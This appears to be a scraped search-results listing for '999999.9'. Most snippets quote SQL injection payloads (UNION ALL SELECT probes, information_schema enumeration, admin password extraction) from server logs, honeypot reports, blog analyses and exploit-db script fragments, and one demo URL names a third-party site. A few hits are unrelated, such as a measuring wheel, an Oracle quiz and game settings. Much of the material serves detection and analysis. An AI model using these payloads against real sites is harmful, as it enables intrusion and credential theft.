| |
http://siberia.is/eben/index.php?p=999999.9-Union-All-Select-0x31303235343830303536
999999.9 Union All Select 0x31303235343830303536. Posted on February 24, 2013 by admin. 20111201-203954.jpg. 20111130-202810.jpg. 20111130-202702.jpg. 20111130-192158.jpg. 20111125-153420.jpg ...
|
http://siberia.is/eben/index.php?p=999999.9-Union-All-Select-(select-Char(114)
999999.9 Union All Select (select Char(114). Posted on March 21, 2013 by admin. 999999.9 union all select (select char(114). 20111201-203954.jpg. 20111130-202810.jpg. 20111130-202702.jpg. 20111130-192158.jpg. 20111125-153420.
|
http://siberia.is/eben/index.php?p=999999.9-Union-All-Select-Null,(select-Cast(char(114)-Char(51)-Char(100)-Char(109)-Char(48)-Char(118)-Char(51)-Char(95)-Char(104)-Char(118)-Char(106)-Char(95)-Char(105)-Char(110)-Char(106)-Char(101)-Char(99)-Char(116)-Char(105)-Char(111)-Char(110)-As-Nvarchar(4000))),null
999999.9 Union All Select Null,(select Cast(char(114) Char(51) Char(100) Char(109) Char(48) Char(118) Char(51) Char(95) Char(104) Char(118) Char(106) Char(95) Char(105) Char(110) Char(106) Char(101) Char(99) ...
|
http://siberia.is/eben/index.php?p=999999.9-Union-All-Select-Null,null,(select-Cast(char(114)-Char(51)-Char(100)-Char(109)-Char(48)-Char(118)-Char(51)-Char(95)-Char(104)-Char(118)-Char(106)-Char(95)-Char(105)-Char(110)-Char(106)-Char(101)-Char(99)-Char(116)-Char(105)-Char(111)-Char(110)-As-Nvarchar(4000)))
999999.9 Union All Select Null,null,(select Cast(char(114) Char(51) Char(100) Char(109) Char(48) Char(118) Char(51) Char(95) Char(104) Char(118) Char(106) Char(95) Char(105) Char(110) Char(106) Char(101) ...
|
http://www.cnblogs.com/daly2008/archive/2013/02/20/2919168.html
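The unfiltered parameter is id, which the program did not validate. While tracking down the problem, analysis of the nginx log turned up a large number of entries like the following, where xxxxxxxxxxx&id= is my normal parameter. xxxxxxxxxxx&id=999999.9+union+all+select+0x31303235343830303536-- ...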
|
http://newmeasuringwheels.blog.com/2012/10/17/calculated-industries-6425-digital-measuring-wheel1-ft999999-9-ft/
CALCULATED INDUSTRIES 6425 Digital Measuring Wheel,1 Ft,999999.9 Ft by CALCULATED INDUSTRIES Electronic Measuring Wheel, Spoked, Wheel Circumference 3 1/4 Ft, Wheel Dia 12 9/16 In, Measurement Capacity ...
|
http://www.dhirajranka.com/?p=716
127.0.0.1 - - [14/Sep/2012:15:45:10 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29% ...
|
http://bot24.blogspot.com/2012/07/joomla-comodudeprofile-v2x-vulnerability.html
... demo1: http://genteagro.com/index.php?option=com_odudeprofile&view=search&profession=999999.9%27%20union%20all%20select%200x31303235343830303536%2C%28select%20concat%28username,0x3D ...
|
http://blog.spiderlabs.com/2012/12/honeypot-alert-sql-injection-scanning-detected-in-wordpress-error-logs.html
... id = 999999.9 UNION ALL SELECT 0x31303235343830303536,0x313032353438303035' at line 1 for query SELECT text, author_id, date FROM WHERE id = 999999.9 UNION ALL SELECT 0x31303235343830303536 ...
|
http://blog.163.com/cmdbat@126/blog/static/17029212320132183748518/
ID:999999.9' union all select (select concat(0x7e,0x27,0x7233646D3076335F68766A5F696E6A656374696F6E,0x27,0x7e) limit 0,1),0x31303235343830303536,0x31303235343830303536 and 'x'='x. ID:999999.9' union ...
|
http://kiminets.pixnet.net/blog/post/38839193-%E5%85%B8%E5%9E%8Bsql-injection%E6%94%BB%E6%93%8A%E6%89%8B%E6%B3%95
85.237.211.211 - - [16/Mar/2013:06:34:06 +0800] "GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 6728 ...
|
http://blog.opencs.org/2013/02/paypal-scam-hosted-by-comprimised.html
/napoli.php?id=999999.9 union all select 0x31303235343830303536,(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1) ...
|
http://www.wellgolly.com/?p=1364
... I could possibly have such a malformed query. What clinched it for me are these queries: WHERE product_id = 999999.9/**//*!30000union/**/all/**/select/**/(select/**/concat(0x7e,0x27,group_concat(column_name),0x27 ...
|
http://minkara.carview.co.jp/userid/232367/blog/7984417/
About "It was supposed to be '9999/99.9'!?" - にかやま's blog. Powered by みんカラ.
|
http://ocatutor.blogspot.com/2012/02/conversion-functions-answers.html
TO_DATE may convert date items to character items. 3. What value is returned after executing the following statement? SELECT TO_NUMBER(1234.49, '999999.9') FROM DUAL; (Choose the best answer.) a. 1234.49. b. 001234.5. c. 1234.5 ...
|
http://linux-101.org/script/dns-benchmarking-python-take-2
... open("DNS-Results-" + server + ".csv", "w") else: resultsDataFile = open("DNS-Results-" + server + ".csv", "a") count = 0 quickestTime = 999999.9 longestTime = 1.0 averageTime = 999999.9 totalTimeMS = 999999.9 print ...
|
http://www.exploit-db.com/exploits/22098/
component."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a"; $res = $b->request(HTTP::Request->new(GET=>$host)); ...
|
http://www.modthegalaxy.com/forums/thread-player-npc-cloths-armor-not-showing
camerFarPlane=999999.9 cameraFarPlaneSpace=999999.9 rederDetailLevel=true renderProjectilePath=true renderLotManager=true ambientLightInCells=True fogDisable=True preloadPlayerMusicManager=True ...
|
http://www.exploit-db.com/exploits/22152/
999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--"; $res = $b->request(HTTP::Request->new(GET=>$host)); ...
|
http://bot24.blogspot.com/2012/10/webgin-sqli-vulnerability.html
cms.php?cms_id= http://www.site.com/folder/cms.php?cms_id=-999999.9 union all select 0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(tbl_energyca_admin.adminPword as char))),0x27,0x7e) from ...
|